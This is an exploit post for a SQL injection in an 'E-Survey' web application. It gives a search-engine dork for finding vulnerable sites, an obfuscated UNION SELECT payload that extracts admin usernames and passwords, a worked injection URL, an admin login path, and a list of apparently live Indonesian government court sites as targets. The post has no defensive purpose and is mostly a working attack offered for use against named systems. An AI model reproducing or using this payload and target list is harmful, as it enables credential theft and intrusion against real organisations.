Exploit Title : E-Survey Applications - SQL INJECTION
# Vendor Homepage : N/A
# Discovered By : KimiHmei7
# Author Homepage : HTTPS://TEGALSEC.ORG
Dork : inurl:/penjelasan.php?id_kategorisend=2
# Injection For Getting Details Username And Password Of Admin
/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,nama_admin,0x3a3a,password))))x)--+
# Example Injection
[-] http://dtc.pn-dataranhunipopu.go.id/e-survey/user/penjelasan.php?id_kategorisend=2%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,nama_admin,0x3a3a,password))))x)--+
# Admin Login Path's
https://target.go.id/admin
# Live Target
1. http://dtc.pn-dataranhunipopu.go.id/e-survey/user/penjelasan.php?id_kategorisend=2'
2. http://e-survey.pt-ambon.go.id/penjelasan.php?id_kategorisend=2'
3. http://e-survey.pn-dataranhunimoa.go.id/penjelasan.php?id_kategorisend=2'
4. http://e-survey.pn-maumere.go.id/user/penjelasan.php?id_kategorisend=2'
etc.